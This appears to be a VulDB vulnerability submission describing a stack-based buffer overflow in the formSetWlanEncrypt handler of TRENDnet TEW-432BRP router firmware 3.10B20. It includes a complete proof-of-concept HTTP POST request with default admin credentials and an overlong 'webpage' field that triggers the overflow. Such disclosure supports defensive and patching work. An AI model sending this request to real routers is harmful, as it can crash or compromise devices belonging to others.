提交 #814773: TRENDnet TEW-432BRP 3.10B20 Stack-based Buffer Overflow信息

标题	TRENDnet TEW-432BRP 3.10B20 Stack-based Buffer Overflow
描述	In formSetWlanEncrypt function, webpage is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the webpage to execute arbitrary code. POST /goform/formSetWlanEncrypt HTTP/1.1 Host: 192.168.10.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://192.168.10.1 Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Referer: http://192.168.10.1/wlan_security.asp?t=1777347015970 Upgrade-Insecure-Requests: 1 wep_type=1&auth_type=2&wep_key_type=0&wep_key_len=5&wep_def_key=0&key1=0000000000&key2=0000000000&key3=0000000000&key4=0000000000&eap_type=0&cipher_type=0&wpapsk1=12345678&wpapsk2=12345678&radius_ip1=x.x.x.x&radius_port1=1812&radius_pass1=&radius_ip2=x.x.x.x&radius_port2=1812&radius_pass2=&save=1&restore_wireless=&webpage=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&Action=onchange&wps_clear_configure_by_reg=0
来源	⚠️ https://github.com/wudipjq/my_vuln/blob/main/TRENDnet/vuln_16/16.md
用户	pjq_Buoy (UID 97666)
提交	2026-04-28 09時14分 (1 月前)
管理	2026-05-30 18時28分 (1 month later)
状态	已接受
VulDB条目	367460 [TRENDnet TEW-432BRP 3.10B20 formSetWlanEncrypt webpage 内存损坏]
积分	20

◂ 上一步一览下一步 ▸

Do you know our Splunk app?

Download it now for free!